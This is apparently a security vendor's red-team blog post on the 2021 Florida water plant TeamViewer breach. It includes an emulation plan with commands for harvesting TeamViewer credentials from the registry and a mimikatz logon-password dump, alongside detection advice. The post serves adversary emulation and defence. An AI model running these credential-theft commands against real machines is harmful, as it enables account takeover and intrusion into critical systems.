Florida Water Plant Breach
TeamViewer was at the forefront of an attack on a Florida water facility in February 2021. A malicious actor logged into the water treatment facility’s computer system through the remote desktop software and tried to increase the amount of sodium hydroxide to a dangerous level. As SCYTHE CEO and co-founder of ICS Village at DefCon, Bryson Bort, said in this Inside CyberSecurity news articles, “TeamViewer is a common remote desktop protocol (RDP) solution in ICS and the water attack was most likely simple access with stolen credentials. Using the software means everything is visible to the user (hence, the operator saw the mouse move and settings changed). Who and why is still the question.”
While using shared credentials (or Valid Accounts in ATT&CK) feels low sophistication, we thought it would be worthwhile to show how we can steal TeamViewer credentials in this edition of #ThreatThursday. We are also collaborating with the ICS Village to demo this and other TTPs at Hack the Capitol and RSA Conference so this post will expand with videos after the conference embargo.
Cyber Threat Intelligence
Many organizations (believe it or not) still use TeamViewer to allow support teams interactive access to their computers for troubleshooting. In the example of the Florida water facility attack, TeamViewer was supposed to have been removed six months prior to the attack. This is a clear indication you may find various, outdated versions of TeamViewer in an environment.
For more on the Florida water plant breach, watch this video with Bryson Bort for RSAC:
As we performed our research on TeamViewer, we learned that previous versions of TeamViewer exposed credentials in the registry. While the credentials are encrypted there is a known decryption key. We also found other vulnerabilities, that have been patched, related to credential exposure such as CVE-2020-13699. In the latest version of TeamViewer (as of April 28, 2021), there are no known methods to steal the clear text credentials to login to a remote machine unless you take a screenshot of the splash screen. Since we do not know what version of TeamViewer is running on the target systems, we have created a threat that uses all known methods.
Adversary Emulation Plan
TeamViewer can be installed as a local, non-administrative user or as a service with local administrator privileges. For this reason, we have designed a SCYTHE threat that leverages the automation language to determine the permission of the SCYTHE payload and steal the credentials from the respective locations At a high level, the threat does the following:
1. Print Screen: printscr --window Desktop
2. System Information: sysinfo
3. Check controller integrity: controller --integrity
4. If high integrity
- Unmanaged powershell to pull the registry information about TeamViewer: upsh --cmd Get-ItemProperty -Path HKLM:\SOFTWARE\WOW6432Node\TeamViewer
- Mimikatz to dump OS credentials: mimikatz --arglist sekurlsa::logonPasswords
5. If non-admin, check these registry keys:
- run reg query HKEY_CURRENT_USER\SOFTWARE\TeamViewer
- run reg query HKEY_CURRENT_USER\SOFTWARE\TeamViewer\MachineFallback
If you do not have SCYTHE, you can use the reg query command to pull TeamViewer information using the below commands:
- reg query HKEY_CURRENT_USER\SOFTWARE\TeamViewer
- reg query HKEY_CURRENT_USER\SOFTWARE\TeamViewer\MachineFallback
- reg query HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer
If you do use SCYTHE, then you get a nice splash screen with credentials:
Here is an ATT&CK heatmap of all the TTPs we have just emulated:
Detection and Response
Do you have TeamViewer in your environment? If you’re not sure, there are multiple ways to check:
- Scan all hosts for TeamViewer.exe process
- Check for the TeamViewer service
- Look for the registry keys mentioned in this post
- Observe network traffic to confirm TeamViewer is not being sent
TeamViewer continues to be used by a number of organizations. As a red teamer, when you land on a system, you should check if TeamViewer is installed and running. We leverage a number of methods to obtain TeamViewer credentials with this threat that you can test immediately by importing it into SCYTHE. At Hack the Capitol and RSAC, we will be revealing some other TTPs related to TeamViewer and attacks against ICS systems, such as how to make the splash screen get to the top as well as the entire attack chain. We hope to see you there!
SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors.